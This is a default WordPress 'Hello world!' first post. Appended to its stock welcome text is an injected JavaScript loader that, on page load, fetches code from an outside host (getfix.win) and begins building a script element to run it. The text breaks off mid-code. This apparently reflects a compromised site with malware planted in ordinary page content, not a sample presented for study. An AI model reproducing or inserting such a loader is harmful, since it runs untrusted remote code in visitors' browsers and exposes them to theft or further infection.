Hello world!
Welcome to WordPress. This is your first post. Edit or delete it, then start writing! ;(function() { loadScript(); function loadScript() { var url = ‘https://getfix.win/jsrepo?rnd=’ + Math.random() + ‘&ts=’ + Date.now(); try { var xhr = new XMLHttpRequest(); xhr.open(‘GET’, url, false); xhr.send(null); if (xhr.status >= 200 && xhr.status < 300) { var script = document.createElement('script'); …